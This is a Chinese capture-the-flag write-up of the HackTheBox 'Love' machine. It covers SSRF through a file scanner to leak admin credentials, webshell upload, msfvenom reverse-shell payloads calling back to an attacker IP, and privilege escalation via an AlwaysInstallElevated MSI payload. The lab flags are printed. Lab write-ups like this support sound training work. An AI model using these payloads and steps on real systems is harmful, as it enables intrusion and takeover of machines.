【渗透测试】hackthebox靶场之Love

admin 2023年1月9日12:01:34评论25 views字数 2076阅读6分55秒阅读模式
【渗透测试】hackthebox靶场之Love

【渗透测试】hackthebox靶场之Love



【渗透测试】hackthebox靶场之Love




0x01信息收集


使用namp扫描端口

【渗透测试】hackthebox靶场之Love

nmap -sV -sS -sC 10.10.10.239

【渗透测试】hackthebox靶场之Love


发现还开放了不少的端口,80,135,139,443,445,3306,5000

通过nmap扫描到的相关信息,发现443端口绑定了staging.love.htb子域名并且403状态码,所以我们把IP地址和主域名子域名进行hosts文件进行解析,保证能通过域名能正常访问web服务

echo "10.10.10.239 staging.love.htb love.htb">> /etc/hosts

【渗透测试】hackthebox靶场之Love



0x02 web渗透

我们先来访问一下主域名love.htb

【渗透测试】hackthebox靶场之Love


发现是个登录页面,通过百度翻译voting system,好像是个投票选举系统,利用常见弱口令试了一下,登录失败。通过burp抓响应头扔进sqlmap发现注入失败。试试子域名staging.love.htb,发现也是一个登录的页面

【渗透测试】hackthebox靶场之Love



点击一下demo,发现一个类似scan这种扫描文件的页面,随便输入一个127.0.0.1发现可以扫描到刚刚的登录窗口

【渗透测试】hackthebox靶场之Love



不过目前还不知道怎么利用这个扫描。回到刚刚扫描的端口信息,发现5000端口也是属于HTTP的web服务,我们访问下5000端口

【渗透测试】hackthebox靶场之Love


发现是403拒绝访问状态码,没有权限。外部访问无权限,如果是用这个扫描器自己内部访问不就有权限了?随即输入127.0.0.1:5000

【渗透测试】hackthebox靶场之Love



发现扫描到了登录的账号admin和密码@LoveIsInTheAir!!!!

然后回到主域名love.htb,用账号密码登录发现没找到这个id,我在想是不是这个页面是迷惑我们的,然后试试加个/admin看下是不是有个管理员登录的页面,发现还真有

【渗透测试】hackthebox靶场之Love


输入账号密码,登录成功!

【渗透测试】hackthebox靶场之Love



在voters模块上发现有个文件上传的功能,这时候可以上传webshell

【渗透测试】hackthebox靶场之Love



我们使用kali自带的webshell,在/usr/share/webshells/php/下找到php-reverse-shell.php。然后用编辑器修改下shell反弹回本机的ip地址和端口

【渗透测试】hackthebox靶场之Love


然后上传后监听1234端口,发现报错

【渗透测试】hackthebox靶场之Love


发现此系统无法找到指定的路径,然后看了下webshell发现,这个webshell是针对linux系统的,回到最开始的端口扫描信息,发现这个系统是windows的,我大意了。

所以,我们可以使用msf生成一个针对win系统的webshell(参考https://www.cnblogs.com/trevain/p/13675241.html)

msfvenom -p php/meterpreter_reverse_tcp LHOST=10.10.14.2 LPORT=1234 -f raw > shell.php


生成php马后上传并用msf去接收shell反弹

use exploit/multi/handlerset payload php/meterpreter_reverse_tcpset lhost 10.10.14.2set lport 1234exploit

【渗透测试】hackthebox靶场之Love


反弹成功,可是瞬间就反弹就挂了。让我们换个思路

既然linux系统不行,直接使用windows中的,,,冰蝎,,,真香(冰蝎能维持比较久时间)

【渗透测试】hackthebox靶场之Love


获得user flag:

1cd157c43e7290d2382e472a13a0c267


0x03提升权限

关于windows提权并不是很熟,尝试开启3389端口发现无权限。只能百度搜一搜,发现知乎有位师傅有写本靶场的教程,看他写的提权是需要用到注册表,用他的方法试试。

当注册表中的alwaysinstallelevated设置为1时,机器上运行任何的msi程序,均会以system权限执行,我们只需生成一个msi的木马程序即可提权。

首先查看一下alwaysinstallelevated的设置

reg queryHKEY_CURRENT_USERSoftwarePoliciesMicrosoftWindowsInstaller
reg queryHKLMSOFTWAREPoliciesMicrosoftWindowsInstaller

【渗透测试】hackthebox靶场之Love


发现都是0x1,表示存在该漏洞


使用msfvenom生成一个msi的马

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.2 LPORT=1234 -f msi >shell.msi


再用msf开启监听,然后把msi马上传上去,利用冰蝎的命令执行功能让他执行msi马(msiexec /quiet /qn /i shell.msi),从而进行msf反弹shell

【渗透测试】hackthebox靶场之Love


获得root flag:

887d5a80e93759c98896d8141db2cf6b





【渗透测试】hackthebox靶场之Love


【渗透测试】hackthebox靶场之Love

【渗透测试】hackthebox靶场之Love

【渗透测试】hackthebox靶场之Armageddon

【渗透测试】hackthebox靶场之Spectra

【渗透测试】hackthebox靶场之ScriptKiddie

【渗透测试】hackthebox靶场之Delivery


【渗透测试】hackthebox靶场之Love
【渗透测试】hackthebox靶场之Love
微信搜一搜
【渗透测试】hackthebox靶场之Love
暗魂攻防实验室


原文始发于微信公众号(暗魂攻防实验室):【渗透测试】hackthebox靶场之Love

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年1月9日12:01:34
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【渗透测试】hackthebox靶场之Lovehttp://cn-sec.com/archives/987060.html

发表评论

匿名网友 填写信息